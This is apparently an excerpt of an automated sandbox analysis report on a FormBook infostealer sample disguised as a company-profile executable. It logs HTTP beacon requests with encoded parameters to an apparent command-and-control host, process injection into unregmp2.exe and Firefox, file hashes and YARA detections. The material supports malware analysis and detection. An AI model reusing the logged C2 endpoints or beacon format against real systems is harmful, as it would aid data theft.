                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWJiXL2YYObfFRQRXcRQxBeCG0NmswV98ettvyPgIO13jc2PfkcLVbMmH6JocVRZNrEDOlser9aoa1pGah0QeGfN%2BmoHBP%2B8OoeEege9DfGKW7cOMDXj5llB3hVxtCh2Iw8%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 91a06998f8717d14-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2038&rtt_var=1019&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1867&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                            Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome f
                                            Mar 2, 2025 12:04:18.575222015 CET98INData Raw: 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70
                                            Data Ascii: riendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.549990104.21.80.1804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:20.178172112 CET580OUTGET /uoki/?505xOj4=hR9UOSbKbp2VMtCNgsThRLVgOj20o3kqc+HH/sAhIWQh/y8XK28Ees9JEd/zrjBVUS7En1yL3QSm+iVMrAfiT2KvS+Z+Z7/3ta2gK53urmJl5KknktZIr1czqmYoD40z/w==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.dd87558.vip
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Mar 2, 2025 12:04:21.067070007 CET833INHTTP/1.1 200 OK
                                            Date: Sun, 02 Mar 2025 11:04:21 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Last-Modified: Fri, 21 Feb 2025 01:14:32 GMT
                                            Accept-Ranges: bytes
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCF1HoQaVTWx4ZclsH6%2FG%2BiA9YwjiX7G3%2BE4Uv0hNERxAm4C8tpHBtSr5xW8rqVlZ%2FNKpvy4zq%2F6GvFx1jTdS5P1Eukv3zZFRJxYbBS9uTpKvOwrqPPmDmBeYifnAIG8kXw%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 91a069a89f33e8a6-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2020&rtt_var=1010&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Mar 2, 2025 12:04:21.067153931 CET1236INData Raw: 64 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f
                                            Data Ascii: d6d<!DOCTYPE html><html lang="en"><head> <script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script> <script>LA.init({id:"3G4N9Q4duBIy4IdT",ck:"3G4N9Q4duBIy4IdT"})</script> <meta charset="UTF-8"> <
                                            Mar 2, 2025 12:04:21.067177057 CET1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 35 36 35 36 3b 68 65 69 67 68 74 3a 20 36 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 35 70 78 3b 77 69 64 74 68 3a 20 32 35 30 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f
                                            Data Ascii: ckground-color: #ff5656;height: 65px;line-height: 65px;width: 250px;color: #fff;font-size: 22px;text-decoration: none;letter-spacing: 2px;margin:20px auto;cursor:pointer;"></a></div><script> window.onload = function(
                                            Mar 2, 2025 12:04:21.067198992 CET972INData Raw: 65 78 74 42 61 73 65 6c 69 6e 65 20 3d 20 27 6d 69 64 64 6c 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 66 6f 6e 74 20 3d 20 72 61 73 20 2f 20 32 2e 32 20 2b 20 27 70 78 20 41 72 69 61 6c 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                            Data Ascii: extBaseline = 'middle'; ctx.font = ras / 2.2 + 'px Arial'; ctx.fillText(index.toFixed(0) + '%', 0, 0); ctx.restore(); document.title = ' ' + index.toFixed(1) + '%'; if (inde
                                            Mar 2, 2025 12:04:21.068099976 CET5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:06:02:13
                                            Start date:02/03/2025
                                            Path:C:\Users\user\Desktop\z1companyProfileandproducts.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\z1companyProfileandproducts.exe"
                                            Imagebase:0xd20000
                                            File size:288'768 bytes
                                            MD5 hash:69FD79206053B8C32283A87FFEBB38AE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2712196168.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:06:03:08
                                            Start date:02/03/2025
                                            Path:C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\V6eYtrWSxBlv.exe"
                                            Imagebase:0xb80000
                                            File size:143'872 bytes
                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3347720640.0000000004650000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:06:03:10
                                            Start date:02/03/2025
                                            Path:C:\Windows\SysWOW64\unregmp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\unregmp2.exe"
                                            Imagebase:0xa30000
                                            File size:214'528 bytes
                                            MD5 hash:51629AAAF753C6411D0B7D37620B7A83
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:06:03:23
                                            Start date:02/03/2025
                                            Path:C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\0a1BBOCBbMMKv.exe"
                                            Imagebase:0xb80000
                                            File size:143'872 bytes
                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:06:03:35
                                            Start date:02/03/2025
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff79f9e0000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >